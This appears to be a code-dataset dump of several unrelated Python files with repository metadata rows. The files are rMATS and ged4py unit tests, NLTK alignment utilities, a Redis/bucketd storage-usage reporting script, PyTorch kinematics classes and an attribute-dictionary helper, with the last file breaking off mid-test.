'end_box': [1, 99],
'counts': [1, 0]
}]
}])
multis = dot_rmats_contents['multis']
if dot_rmats_i == 0:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 200], [299, 299]],
'count':
1
}]
}])
else:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[201, 201], [300, 400], [499, 499]],
'count':
1
}]
}])
self._cp_with_prefix('prep_1_', self._prep_1_tmp_dir,
self._post_tmp_dir)
def _check_results_prep_2(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_no_line_has(self, out_lines,
'Processing count files')
test_gene_id = tests.util.gene_id_str(1)
quoted_test_gene_id = tests.util.double_quote(test_gene_id)
dot_rmats_paths = self._get_dot_rmats_paths(self._prep_2_tmp_dir)
self.assertEqual(len(dot_rmats_paths), 2)
for dot_rmats_i in range(2):
dot_rmats_contents, error = output_parser.parse_dot_rmats(
dot_rmats_paths[dot_rmats_i])
self.assertFalse(error)
self.assertEqual(dot_rmats_contents['bams'],
[self._sample_2_bams[dot_rmats_i].path])
self.assertEqual(dot_rmats_contents['read_length'],
self._read_length)
novel_juncs = dot_rmats_contents['novel_juncs']
self.assertEqual(novel_juncs, [{quoted_test_gene_id: [[0, 0, 2]]}])
exons = dot_rmats_contents['exons']
if dot_rmats_i == 0:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [401, 499],
'end_box': [401, 499],
'counts': [1, 0]
}]
}])
else:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [1, 99],
'end_box': [1, 99],
'counts': [1, 0]
}]
}])
multis = dot_rmats_contents['multis']
if dot_rmats_i == 0:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 400], [499, 499]],
'count':
1
}]
}])
else:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 400], [499, 499]],
'count':
1
}]
}])
self._cp_with_prefix('prep_2_', self._prep_2_tmp_dir,
self._post_tmp_dir)
def _check_results_inte_1_fail(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
tests.util.assert_some_line_has(
self, err_lines, 'input bam files with no associated prep output')
def _check_results_inte_1_pass(self):
self._check_no_error_results()
def _check_results_inte_2_fail(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
tests.util.assert_some_line_has(
self, err_lines,
'bam files not in input but associated with prep output')
def _check_results_inte_2_pass(self):
self._check_no_error_results()
def _check_results_post(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_some_line_has(self, out_lines,
'Processing count files')
from_gtf_se_path = os.path.join(self._out_dir, 'fromGTF.SE.txt')
from_gtf_se_header, from_gtf_se_rows, error = output_parser.parse_from_gtf(
from_gtf_se_path)
self.assertFalse(error)
self.assertEqual(len(from_gtf_se_rows), 1)
from_gtf_se_row = from_gtf_se_rows[0]
self.assertEqual(from_gtf_se_row['GeneID'],
tests.util.double_quote(tests.util.gene_id_str(1)))
self.assertEqual(from_gtf_se_row['exonStart_0base'], '200')
self.assertEqual(from_gtf_se_row['exonEnd'], '300')
jc_raw_se_path = os.path.join(self._out_dir, 'JC.raw.input.SE.txt')
jc_raw_se_header, jc_raw_se_rows, error = output_parser.parse_jc_raw(
jc_raw_se_path)
self.assertFalse(error)
self.assertEqual(len(jc_raw_se_rows), 1)
jc_raw_se_row = jc_raw_se_rows[0]
self.assertEqual(jc_raw_se_row['ID'], from_gtf_se_row['ID'])
self.assertEqual(jc_raw_se_row['IJC_SAMPLE_1'], '1,1')
self.assertEqual(jc_raw_se_row['SJC_SAMPLE_1'], '0,0')
self.assertEqual(jc_raw_se_row['IJC_SAMPLE_2'], '0,0')
self.assertEqual(jc_raw_se_row['SJC_SAMPLE_2'], '1,1')
se_mats_jc_path = os.path.join(self._out_dir, 'SE.MATS.JC.txt')
se_mats_jc_header, se_mats_jc_rows, error = output_parser.parse_mats_jc(
se_mats_jc_path)
self.assertFalse(error)
self._check_se_mats_jc_header(se_mats_jc_header)
self.assertEqual(len(se_mats_jc_rows), 1)
se_mats_jc_row = se_mats_jc_rows[0]
pvalue = float(se_mats_jc_row['PValue'])
tests.util.assert_within_bounds(self, pvalue, 0, 1)
fdr = float(se_mats_jc_row['FDR'])
tests.util.assert_within_bounds(self, fdr, 0, 1)
inc_level_1_splits = se_mats_jc_row['IncLevel1'].split(',')
self.assertEqual(len(inc_level_1_splits), 2)
self.assertAlmostEqual(float(inc_level_1_splits[0]), 1)
self.assertAlmostEqual(float(inc_level_1_splits[1]), 1)
inc_level_2_splits = se_mats_jc_row['IncLevel2'].split(',')
self.assertEqual(len(inc_level_2_splits), 2)
self.assertAlmostEqual(float(inc_level_2_splits[0]), 0)
self.assertAlmostEqual(float(inc_level_2_splits[1]), 0)
self.assertAlmostEqual(float(se_mats_jc_row['IncLevelDifference']), 1)
def _check_results_dup_input_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
dup_bam_path = self._sample_1_bams[0].path
expected_error = '{} given 2 times'.format(dup_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
def _check_results_dup_prep_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
for bam in self._sample_1_bams:
dup_bam_path = bam.path
expected_error = '{} found 2 times in .rmats'.format(dup_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
def _check_results_miss_input_bam(self):
self._check_no_error_results()
def _check_results_miss_prep_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
for bam in self._sample_2_bams:
miss_bam_path = bam.path
expected_error = '{} not found in .rmats'.format(miss_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
if __name__ == '__main__':
unittest.main(verbosity=2)
| 39.75 | 83 | 0.553263 | 3,131 | 25,440 | 3.984031 | 0.067071 | 0.020683 | 0.025573 | 0.025814 | 0.797819 | 0.735289 | 0.662819 | 0.618086 | 0.568462 | 0.531666 | 0 | 0.031469 | 0.347956 | 25,440 | 639 | 84 | 39.812207 | 0.720521 | 0.006879 | 0 | 0.527531 | 0 | 0 | 0.070521 | 0 | 0 | 0 | 0 | 0 | 0.104796 | 1 | 0.046181 | false | 0.017762 | 0.019538 | 0.001776 | 0.078153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cc57c915f6cace046e0bbe739957206038f009f
| 1,527 |
py
|
Python
|
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | 1 |
2015-11-25T00:47:58.000Z
|
2015-11-25T00:47:58.000Z
|
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | null | null | null |
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | null | null | null |
# Natural Language Toolkit: Aligner Utilities
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Anna Garbar
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
from nltk.align.api import Alignment
def pharaohtext2tuples(pharaoh_text):
"""
Converts pharaoh text format into an Alignment object (a list of tuples).
>>> pharaoh_text = '0-0 2-1 9-2 21-3 10-4 7-5'
>>> pharaohtext2tuples(pharaoh_text)
Alignment([(0, 0), (2, 1), (7, 5), (9, 2), (10, 4), (21, 3)])
:type pharaoh_text: str
:param pharaoh_text: the word alignment outputs in the pharaoh output format
:rtype: Alignment
:return: An Alignment object that contains a list of integer tuples
"""
# Converts integers to strings for a word alignment point.
list_of_tuples = [tuple(map(int,a.split('-'))) for a in pharaoh_text.split()]
return Alignment(list_of_tuples)
def alignment2pharaohtext(alignment):
"""
Converts an Alignment object (a list of tuples) into pharaoh text format.
>>> alignment = [(0, 0), (2, 1), (9, 2), (21, 3), (10, 4), (7, 5)]
>>> alignment2pharaohtext(alignment)
'0-0 2-1 9-2 21-3 10-4 7-5'
:type alignment: Alignment
:param alignment: An Alignment object that contains a list of integer tuples
:rtype: str
:return: the word alignment outputs in the pharaoh output format
"""
pharaoh_text = ' '.join(str(i) + "-" + str(j) for i,j in alignment)
return pharaoh_text
| 33.933333 | 81 | 0.642436 | 218 | 1,527 | 4.444954 | 0.348624 | 0.113519 | 0.070175 | 0.016512 | 0.335397 | 0.321981 | 0.321981 | 0.260062 | 0.260062 | 0.163055 | 0 | 0.058219 | 0.235102 | 1,527 | 44 | 82 | 34.704545 | 0.771404 | 0.693517 | 0 | 0 | 0 | 0 | 0.008357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cda6328ac58b61f05923cca8623aa6b42f94561
| 3,591 |
py
|
Python
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 13 |
2016-10-07T20:25:11.000Z
|
2022-02-23T06:33:59.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 427 |
2016-08-17T18:03:32.000Z
|
2022-03-31T10:46:12.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 5 |
2017-04-25T21:13:03.000Z
|
2018-01-23T00:21:06.000Z
|
import requests
import redis
import json
import ast
import sys
import time
import urllib
import re
import sys
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import argparse
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--sentinel-ip", default='127.0.0.1', help="Sentinel IP")
parser.add_argument("-p", "--sentinel-port", default="16379", help="Sentinel Port")
parser.add_argument("-v", "--redis-password", default=None, help="Redis AUTH Password")
parser.add_argument("-n", "--sentinel-cluster-name", default='scality-s3', help="Redis cluster name")
parser.add_argument("-b", "--bucketd-addr", default='http://127.0.0.1:9000', help="URL of the bucketd server")
return parser.parse_args()
def safe_print(content):
print("{0}".format(content))
class askRedis():
def __init__(self, ip="127.0.0.1", port="16379", sentinel_cluster_name="scality-s3", password=None):
self._password = password
r = redis.Redis(host=ip, port=port, db=0, password=password)
self._ip, self._port = r.sentinel_get_master_addr_by_name(sentinel_cluster_name)
def read(self, resource, name):
r = redis.Redis(host=self._ip, port=self._port, db=0, password=self._password)
res = 's3:%s:%s:storageUtilized:counter' % (resource, name)
total_size = r.get(res)
res = 's3:%s:%s:numberOfObjects:counter' % (resource, name)
files = r.get(res)
try:
return {'files': int(files), "total_size": int(total_size)}
except Exception as e:
return {'files': 0, "total_size": 0}
class S3ListBuckets():
def __init__(self, host='127.0.0.1:9000'):
self.bucketd_host = host
def run(self):
docs = []
url = "%s/default/bucket/users..bucket" % self.bucketd_host
session = requests.Session()
r = session.get(url, timeout=30)
if r.status_code == 200:
payload = json.loads(r.text)
for keys in payload['Contents']:
key = keys["key"]
r1 = re.match("(\w+)..\|..(\w+.*)", key)
docs.append(r1.groups())
return docs
return(self.userid, self.bucket, user, files, total_size)
if __name__ == '__main__':
options = get_options()
redis_conf = dict(
ip=options.sentinel_ip,
port=options.sentinel_port,
sentinel_cluster_name=options.sentinel_cluster_name,
password=options.redis_password
)
P = S3ListBuckets(options.bucketd_addr)
listbuckets = P.run()
userids = set([x for x, y in listbuckets])
executor = ThreadPoolExecutor(max_workers=1)
for userid, bucket in listbuckets:
U = askRedis(**redis_conf)
data = U.read('buckets', bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
data = U.read('buckets', 'mpuShadowBucket'+bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, 'mpuShadowBucket'+bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
executor.submit(safe_print, "")
for userid in sorted(userids):
U = askRedis(**redis_conf)
data = U.read('accounts', userid)
content = "Account:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, data["files"], data["total_size"])
executor.submit(safe_print, content)
| 35.554455 | 114 | 0.634085 | 452 | 3,591 | 4.889381 | 0.292035 | 0.032579 | 0.038462 | 0.01086 | 0.184163 | 0.175113 | 0.158371 | 0.133937 | 0.133937 | 0.133937 | 0 | 0.021708 | 0.217488 | 3,591 | 101 | 115 | 35.554455 | 0.764769 | 0 | 0 | 0.109756 | 0 | 0 | 0.190145 | 0.076837 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0.073171 | 0.146341 | 0 | 0.292683 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cdd5ddf7b7d2568fd208a60927251ae8e3ac857
| 10,399 |
py
|
Python
|
retargeting/models/Kinematics.py
|
yujiatay/deep-motion-editing
|
0a6fc5fd20059c5074f68a452cd49cf6ede36ea8
|
[
"BSD-2-Clause"
] | 1 |
2021-07-06T14:34:12.000Z
|
2021-07-06T14:34:12.000Z
|
retargeting/models/Kinematics.py
|
bmd080/deep-motion-editing
|
19604abdc0ead66f8c82d9211b8c5862c6a68089
|
[
"BSD-2-Clause"
] | null | null | null |
retargeting/models/Kinematics.py
|
bmd080/deep-motion-editing
|
19604abdc0ead66f8c82d9211b8c5862c6a68089
|
[
"BSD-2-Clause"
] | null | null | null |
import torch
import torch.nn as nn
import numpy as np
import math
class ForwardKinematics:
def __init__(self, args, edges):
self.topology = [-1] * (len(edges) + 1)
self.rotation_map = []
for i, edge in enumerate(edges):
self.topology[edge[1]] = edge[0]
self.rotation_map.append(edge[1])
self.world = args.fk_world
self.pos_repr = args.pos_repr
self.quater = args.rotation == 'quaternion'
def forward_from_raw(self, raw, offset, world=None, quater=None):
if world is None: world = self.world
if quater is None: quater = self.quater
if self.pos_repr == '3d':
position = raw[:, -3:, :]
rotation = raw[:, :-3, :]
elif self.pos_repr == '4d':
raise Exception('Not support')
if quater:
rotation = rotation.reshape((rotation.shape[0], -1, 4, rotation.shape[-1]))
identity = torch.tensor((1, 0, 0, 0), dtype=torch.float, device=raw.device)
else:
rotation = rotation.reshape((rotation.shape[0], -1, 3, rotation.shape[-1]))
identity = torch.zeros((3, ), dtype=torch.float, device=raw.device)
identity = identity.reshape((1, 1, -1, 1))
new_shape = list(rotation.shape)
new_shape[1] += 1
new_shape[2] = 1
rotation_final = identity.repeat(new_shape)
for i, j in enumerate(self.rotation_map):
rotation_final[:, j, :, :] = rotation[:, i, :, :]
return self.forward(rotation_final, position, offset, world=world, quater=quater)
'''
rotation should have shape batch_size * Joint_num * (3/4) * Time
position should have shape batch_size * 3 * Time
offset should have shape batch_size * Joint_num * 3
output have shape batch_size * Time * Joint_num * 3
'''
def forward(self, rotation: torch.Tensor, position: torch.Tensor, offset: torch.Tensor, order='xyz', quater=False, world=True):
if not quater and rotation.shape[-2] != 3: raise Exception('Unexpected shape of rotation')
if quater and rotation.shape[-2] != 4: raise Exception('Unexpected shape of rotation')
rotation = rotation.permute(0, 3, 1, 2)
position = position.permute(0, 2, 1)
result = torch.empty(rotation.shape[:-1] + (3, ), device=position.device)
norm = torch.norm(rotation, dim=-1, keepdim=True)
#norm[norm < 1e-10] = 1
rotation = rotation / norm
if quater:
transform = self.transform_from_quaternion(rotation)
else:
transform = self.transform_from_euler(rotation, order)
offset = offset.reshape((-1, 1, offset.shape[-2], offset.shape[-1], 1))
result[..., 0, :] = position
for i, pi in enumerate(self.topology):
if pi == -1:
assert i == 0
continue
transform[..., i, :, :] = torch.matmul(transform[..., pi, :, :], transform[..., i, :, :])
result[..., i, :] = torch.matmul(transform[..., i, :, :], offset[..., i, :, :]).squeeze()
if world: result[..., i, :] += result[..., pi, :]
return result
def from_local_to_world(self, res: torch.Tensor):
res = res.clone()
for i, pi in enumerate(self.topology):
if pi == 0 or pi == -1:
continue
res[..., i, :] += res[..., pi, :]
return res
@staticmethod
def transform_from_euler(rotation, order):
rotation = rotation / 180 * math.pi
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 1], order[1]),
ForwardKinematics.transform_from_axis(rotation[..., 2], order[2]))
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 0], order[0]), transform)
return transform
@staticmethod
def transform_from_axis(euler, axis):
transform = torch.empty(euler.shape[0:3] + (3, 3), device=euler.device)
cos = torch.cos(euler)
sin = torch.sin(euler)
cord = ord(axis) - ord('x')
transform[..., cord, :] = transform[..., :, cord] = 0
transform[..., cord, cord] = 1
if axis == 'x':
transform[..., 1, 1] = transform[..., 2, 2] = cos
transform[..., 1, 2] = -sin
transform[..., 2, 1] = sin
if axis == 'y':
transform[..., 0, 0] = transform[..., 2, 2] = cos
transform[..., 0, 2] = sin
transform[..., 2, 0] = -sin
if axis == 'z':
transform[..., 0, 0] = transform[..., 1, 1] = cos
transform[..., 0, 1] = -sin
transform[..., 1, 0] = sin
return transform
@staticmethod
def transform_from_quaternion(quater: torch.Tensor):
qw = quater[..., 0]
qx = quater[..., 1]
qy = quater[..., 2]
qz = quater[..., 3]
x2 = qx + qx
y2 = qy + qy
z2 = qz + qz
xx = qx * x2
yy = qy * y2
wx = qw * x2
xy = qx * y2
yz = qy * z2
wy = qw * y2
xz = qx * z2
zz = qz * z2
wz = qw * z2
m = torch.empty(quater.shape[:-1] + (3, 3), device=quater.device)
m[..., 0, 0] = 1.0 - (yy + zz)
m[..., 0, 1] = xy - wz
m[..., 0, 2] = xz + wy
m[..., 1, 0] = xy + wz
m[..., 1, 1] = 1.0 - (xx + zz)
m[..., 1, 2] = yz - wx
m[..., 2, 0] = xz - wy
m[..., 2, 1] = yz + wx
m[..., 2, 2] = 1.0 - (xx + yy)
return m
class InverseKinematics:
def __init__(self, rotations: torch.Tensor, positions: torch.Tensor, offset, parents, constrains):
self.rotations = rotations
self.rotations.requires_grad_(True)
self.position = positions
self.position.requires_grad_(True)
self.parents = parents
self.offset = offset
self.constrains = constrains
self.optimizer = torch.optim.Adam([self.position, self.rotations], lr=1e-3, betas=(0.9, 0.999))
self.crit = nn.MSELoss()
def step(self):
self.optimizer.zero_grad()
glb = self.forward(self.rotations, self.position, self.offset, order='', quater=True, world=True)
loss = self.crit(glb, self.constrains)
loss.backward()
self.optimizer.step()
self.glb = glb
return loss.item()
def tloss(self, time):
return self.crit(self.glb[time, :], self.constrains[time, :])
def all_loss(self):
res = [self.tloss(t).detach().numpy() for t in range(self.constrains.shape[0])]
return np.array(res)
'''
rotation should have shape batch_size * Joint_num * (3/4) * Time
position should have shape batch_size * 3 * Time
offset should have shape batch_size * Joint_num * 3
output have shape batch_size * Time * Joint_num * 3
'''
def forward(self, rotation: torch.Tensor, position: torch.Tensor, offset: torch.Tensor, order='xyz', quater=False,
world=True):
'''
if not quater and rotation.shape[-2] != 3: raise Exception('Unexpected shape of rotation')
if quater and rotation.shape[-2] != 4: raise Exception('Unexpected shape of rotation')
rotation = rotation.permute(0, 3, 1, 2)
position = position.permute(0, 2, 1)
'''
result = torch.empty(rotation.shape[:-1] + (3,), device=position.device)
norm = torch.norm(rotation, dim=-1, keepdim=True)
rotation = rotation / norm
if quater:
transform = self.transform_from_quaternion(rotation)
else:
transform = self.transform_from_euler(rotation, order)
offset = offset.reshape((-1, 1, offset.shape[-2], offset.shape[-1], 1))
result[..., 0, :] = position
for i, pi in enumerate(self.parents):
if pi == -1:
assert i == 0
continue
result[..., i, :] = torch.matmul(transform[..., pi, :, :], offset[..., i, :, :]).squeeze()
transform[..., i, :, :] = torch.matmul(transform[..., pi, :, :], transform[..., i, :, :])
if world: result[..., i, :] += result[..., pi, :]
return result
@staticmethod
def transform_from_euler(rotation, order):
rotation = rotation / 180 * math.pi
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 1], order[1]),
ForwardKinematics.transform_from_axis(rotation[..., 2], order[2]))
transform = torch.matmul(ForwardKinematics.transform_from_axis(rotation[..., 0], order[0]), transform)
return transform
@staticmethod
def transform_from_axis(euler, axis):
transform = torch.empty(euler.shape[0:3] + (3, 3), device=euler.device)
cos = torch.cos(euler)
sin = torch.sin(euler)
cord = ord(axis) - ord('x')
transform[..., cord, :] = transform[..., :, cord] = 0
transform[..., cord, cord] = 1
if axis == 'x':
transform[..., 1, 1] = transform[..., 2, 2] = cos
transform[..., 1, 2] = -sin
transform[..., 2, 1] = sin
if axis == 'y':
transform[..., 0, 0] = transform[..., 2, 2] = cos
transform[..., 0, 2] = sin
transform[..., 2, 0] = -sin
if axis == 'z':
transform[..., 0, 0] = transform[..., 1, 1] = cos
transform[..., 0, 1] = -sin
transform[..., 1, 0] = sin
return transform
@staticmethod
def transform_from_quaternion(quater: torch.Tensor):
qw = quater[..., 0]
qx = quater[..., 1]
qy = quater[..., 2]
qz = quater[..., 3]
x2 = qx + qx
y2 = qy + qy
z2 = qz + qz
xx = qx * x2
yy = qy * y2
wx = qw * x2
xy = qx * y2
yz = qy * z2
wy = qw * y2
xz = qx * z2
zz = qz * z2
wz = qw * z2
m = torch.empty(quater.shape[:-1] + (3, 3), device=quater.device)
m[..., 0, 0] = 1.0 - (yy + zz)
m[..., 0, 1] = xy - wz
m[..., 0, 2] = xz + wy
m[..., 1, 0] = xy + wz
m[..., 1, 1] = 1.0 - (xx + zz)
m[..., 1, 2] = yz - wx
m[..., 2, 0] = xz - wy
m[..., 2, 1] = yz + wx
m[..., 2, 2] = 1.0 - (xx + yy)
return m
| 36.233449 | 131 | 0.521877 | 1,272 | 10,399 | 4.203616 | 0.121855 | 0.005985 | 0.020946 | 0.026931 | 0.715728 | 0.695156 | 0.683935 | 0.662615 | 0.634187 | 0.625771 | 0 | 0.036943 | 0.315415 | 10,399 | 286 | 132 | 36.36014 | 0.714145 | 0.026637 | 0 | 0.671171 | 0 | 0 | 0.009929 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 1 | 0.067568 | false | 0 | 0.018018 | 0.004505 | 0.153153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ce0fee58832e03db2dedb448c80880f25c203aa
| 800 |
py
|
Python
|
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | 1 |
2019-05-04T09:26:36.000Z
|
2019-05-04T09:26:36.000Z
|
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | null | null | null |
mppi/Utilities/AttributeDict.py
|
marcodalessandro76/MPPI
|
ad60b73270b1f376ac501d47285146f1c3af457a
|
[
"MIT"
] | null | null | null |
class AttributeDict(object):
"""
A class to convert a nested Dictionary into an object with key-values
accessibly using attribute notation (AttributeDict.attribute) instead of
key notation (Dict["key"]). This class recursively sets Dicts to objects,
allowing you to recurse down nested dicts (like: AttributeDict.attr.attr)
"""
def __init__(self, **entries):
self.add_entries(**entries)
def add_entries(self, **entries):
for key, value in entries.items():
if type(value) is dict:
self.__dict__[key] = AttributeDict(**value)
else:
self.__dict__[key] = value
def getAttributes(self):
"""
Return all the attributes of the object
"""
return self.__dict__.keys()
| 34.782609 | 77 | 0.62875 | 94 | 800 | 5.159574 | 0.531915 | 0.043299 | 0.045361 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.275 | 800 | 22 | 78 | 36.363636 | 0.836207 | 0.4125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7ce3c5ddd55aea55c48d0f942c54f7645b346e45
| 24,690 |
py
|
Python
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 10 |
2017-07-25T22:39:34.000Z
|
2022-03-01T04:40:38.000Z
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 20 |
2018-03-25T10:25:40.000Z
|
2021-05-02T20:38:48.000Z
|
tests/test_date.py
|
andy-z/ged4py
|
2270bd8366174dcc98424cc6671bdaecf770fda0
|
[
"MIT"
] | 6 |
2018-04-29T12:45:34.000Z
|
2021-09-14T14:30:52.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ged4py.date` module."""
import unittest
from ged4py.calendar import (
CalendarType, CalendarDate, FrenchDate, GregorianDate, HebrewDate, JulianDate,
CalendarDateVisitor
)
from ged4py.date import (
DateValue, DateValueAbout, DateValueAfter, DateValueBefore, DateValueCalculated,
DateValueEstimated, DateValueFrom, DateValueInterpreted, DateValuePeriod,
DateValuePhrase, DateValueRange, DateValueSimple, DateValueTo, DateValueTypes,
DateValueVisitor
)
class TestDateVisitor(CalendarDateVisitor, DateValueVisitor):
def visitGregorian(self, date):
if not isinstance(date, GregorianDate):
raise TypeError(str(type(date)))
return ("gregorian", date)
def visitJulian(self, date):
if not isinstance(date, JulianDate):
raise TypeError(str(type(date)))
return ("julian", date)
def visitHebrew(self, date):
if not isinstance(date, HebrewDate):
raise TypeError(str(type(date)))
return ("hebrew", date)
def visitFrench(self, date):
if not isinstance(date, FrenchDate):
raise TypeError(str(type(date)))
return ("french", date)
def visitSimple(self, date):
if not isinstance(date, DateValueSimple):
raise TypeError(str(type(date)))
return ("simple", date.date)
def visitPeriod(self, date):
if not isinstance(date, DateValuePeriod):
raise TypeError(str(type(date)))
return ("period", date.date1, date.date2)
def visitFrom(self, date):
if not isinstance(date, DateValueFrom):
raise TypeError(str(type(date)))
return ("from", date.date)
def visitTo(self, date):
if not isinstance(date, DateValueTo):
raise TypeError(str(type(date)))
return ("to", date.date)
def visitRange(self, date):
if not isinstance(date, DateValueRange):
raise TypeError(str(type(date)))
return ("range", date.date1, date.date2)
def visitBefore(self, date):
if not isinstance(date, DateValueBefore):
raise TypeError(str(type(date)))
return ("before", date.date)
def visitAfter(self, date):
if not isinstance(date, DateValueAfter):
raise TypeError(str(type(date)))
return ("after", date.date)
def visitAbout(self, date):
if not isinstance(date, DateValueAbout):
raise TypeError(str(type(date)))
return ("about", date.date)
def visitCalculated(self, date):
if not isinstance(date, DateValueCalculated):
raise TypeError(str(type(date)))
return ("calculated", date.date)
def visitEstimated(self, date):
if not isinstance(date, DateValueEstimated):
raise TypeError(str(type(date)))
return ("estimated", date.date)
def visitInterpreted(self, date):
if not isinstance(date, DateValueInterpreted):
raise TypeError(str(type(date)))
return ("interpreted", date.date, date.phrase)
def visitPhrase(self, date):
if not isinstance(date, DateValuePhrase):
raise TypeError(str(type(date)))
return ("phrase", date.phrase)
class TestDetailDate(unittest.TestCase):
"""Tests for `ged4py.date` module."""
def test_001_cal_date(self):
"""Test date.CalendarDate class."""
date = GregorianDate(2017, "OCT", 9)
self.assertEqual(date.year, 2017)
self.assertIsNone(date.dual_year)
self.assertFalse(date.bc)
self.assertEqual(date.year_str, "2017")
self.assertEqual(date.month, "OCT")
self.assertEqual(date.month_num, 10)
self.assertEqual(date.day, 9)
self.assertEqual(date.calendar, CalendarType.GREGORIAN)
date = GregorianDate(2017, "OCT", bc=True)
self.assertEqual(date.year, 2017)
self.assertIsNone(date.dual_year)
self.assertTrue(date.bc)
self.assertEqual(date.year_str, "2017 B.C.")
self.assertEqual(date.month, "OCT")
self.assertEqual(date.month_num, 10)
self.assertIsNone(date.day)
